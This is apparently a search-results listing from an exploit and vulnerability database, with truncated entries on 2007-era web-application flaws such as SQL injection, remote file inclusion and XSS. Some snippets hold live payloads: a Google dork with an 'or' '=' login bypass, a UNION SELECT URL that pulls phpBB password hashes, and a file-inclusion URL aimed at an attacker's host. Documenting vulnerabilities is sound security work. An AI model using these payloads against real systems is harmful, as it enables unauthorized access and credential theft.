6697 matches found
admentor-sql.txt
AdMentor banners admin SQL injection By : sn0oPy Risk : high Site : http://www.aspcode.net/products/admentor Dork : inurl:"admentor/admin" exploit : UserID = 'or' '=' Password = 'or' '=' contact : [email protected] greetz : subzero, Avg Team http://forums.avenir-geopolitique.net. references :...
AdMentor (banners) admin SQL injection
AdMentor banners admin SQL injection By : sn0oPy Risk : high Site : http://www.aspcode.net/products/admentor Dork : inurl:"admentor/admin" exploit : UserID = 'or' '=' Password = 'or' '=' contact : [email protected] greetz : subzero, Avg Team http://forums.avenir-geopolitique.net. references :...
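Virtual Host Administrator Modules_Dir Remote File Inclusion Vulnerability
Virtual Host Administrator is a PHP-based web application. Virtual Host Administrator does not properly filter user-supplied input, which remote attackers can exploit to execute arbitrary commands with the web server's privileges. The problem is that the 'main.php' script fails to filter the user-supplied 'MODULESDIR' parameter; specifying a file on a remote server as the include parameter can lead to arbitrary command execution with the web server's privileges. Inter7 vhostadmin 0.1 No solution is currently available: http://www.inter7.com/index.php?page=vhostadmin...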
CVE-2007-0486
Multiple PHP remote file inclusion vulnerabilities in Openads (aka phpAdsNew) 2.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the (1) phpAdsgeoPlugin parameter to libraries/lib-remotehost.inc, the (2) filename parameter to admin/report-index, or the (3) phpAdsconfigmyfooter...
CVE-2007-0400
Cross-site scripting XSS vulnerability in admin/memberlist.php in Easebay Resources Login Manager 3.0 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter...
CVE-2007-0400
CVE-2007-0400 is an XSS vulnerability in the admin/memberlist.php of the Easebay Resources Login Manager 3.0. The flaw allows remote attackers to inject arbitrary web script or HTML via the keyword parameter, potentially compromising user sessions or browser contexts. The NVD entry lists a CVSSv2...
CVE-2007-0401
The CVE-2007-0401 entry affects Easebay Resources Login Manager 3.0, specifically the admin/memberlist.php component. The vulnerability is an SQL injection via the init_row parameter, allowing remote attackers to execute arbitrary SQL commands. The linked documents do not provide explicit exploit...
CVE-2007-0402
CVE-2007-0402 describes a cross-site scripting (XSS) vulnerability in the Admin module: admin/edit_member.php of Easebay Resources Paypal Subscription Manager. The issue allows remote attackers to inject arbitrary web script or HTML through the username parameter. The vulnerability is documented ...
CVE-2007-0261
snews.php in sNews 1.5.30 and earlier does not properly exit when authentication fails, which allows remote attackers to perform unauthorized administrative actions, as demonstrated by changing an administrative password via the changeup task, and by uploading PHP code via the imagefile parameter...
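AllMyGuests Remote File Inclusion Vulnerability
AllMyGuests is a PHP-based web application. AllMyGuests does not properly filter user-supplied input, which remote attackers can exploit to execute arbitrary commands with the web server's privileges. The problem is that multiple scripts fail to filter the user-supplied 'AMGserverpath' parameter; specifying a file on a remote server as the include parameter can lead to arbitrary command execution with the web server's privileges. AllMyPHP AllMyGuests 0.3 No solution is currently available: http://www.php-resource.net/content-12.html http://example.com/include/submit.inc.php?AMGserverpath=attacker's...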
createauction-rfi.txt
============================ HItamputih Crew ==================== hitamputih Advisory Discovered By : IbnuSina ----------------------------------------------------------- Software: createauction Script : http://www.scriptaty.net/magic-photo-storage-website.html Method: file inclusion Thanks To :...
CVE-2007-0205
CVE-2007-0205 is a directory traversal vulnerability in the admin/skins.php module of @lex Guestbook 4.0.2 and earlier. Attackers can create files in arbitrary directories by supplying .. sequences in the aj_skin and skin_edit parameters, which can enable file inclusion by placing a skin file in...
magic photo storage website Multiple Remote File Inclusion
============================ HItamputih Crew ==================== hitamputih Advisory Discovered By : IbnuSina ----------------------------------------------------------- Software: createauction Script : http://www.scriptaty.net/magic-photo-storage-website.html Method: file inclusion Thanks To :...
PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities
Exploit for unknown platform in category web applications ========================================================================= PPC Search Engine 1.61 INC Multiple Remote File Include Vulnerabilities =========================================================================...
AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities
No description provided by source. AllMyGuests 3.0 Remote File Inclusion Vulnerability Software: AllMyGuests Version: 3.0 Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip Found By: beks Bug In: /include/submit.inc.php /admin/index.php /include/cmsubmit.inc.php...
Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability
No description provided by source. Vizayn Haber tr == tr SQL Injection Vulnerability Author : chernobiLe Site : www.cyber-sabotage.org , www.chernobiLe.com Contact: [email protected] Risk : High Download Link Of Vizayn Haber : http://aspindir.com/goster/4623 Exploit; Admin Nick, Passport,...
Acronym Mod v0.9.5 Remote SQL Injection Vulnerability
Acronym Mod v0.9.5 Remote SQL Injection Vulnerability Download: http://www.codemonkeyx.net Found By: the master exploit: http://Target/Path/admin/adminacronyms.php?mode=edit&id=-120UNION20SELECT20null,userpassword,null20FROM20phpbbusers20where20userid=2&sid=AdminHash Greetz: str0ke , Dr Max Virus...
Enthrallweb eJobs - newsdetail.asp SQL Injection
Enthrallweb eJobs - newsdetail.asp SQL Injection !/usr/bin/perl Script Name: Enthrallweb eJobs newsdetail.asp Remote SQL Injection Exploit Coded by : ajann Author : ajann Contact : : S.Page : http://www.enthrallweb.us $$ : 179.40 USD .. : ajann,Turkey use IO::Socket; if@ARGV newProto = "tcp",...
EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln
No description provided by source. EternalMart Guestbook 1.1.0 emgbadminpath Remote File Include +class : Remote File Include Vulnerability +Author : mdx +Files : +admin/auth.php? +code : + + include"$emgbadminpath/authfunc.php"; + + download link :...
PHP Advanced Transfer Manager 1.30 - Source Code Disclosure
DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patriots : - Leito & Leon | friend str0ke ; Blund Coder, D0han, d3m0n...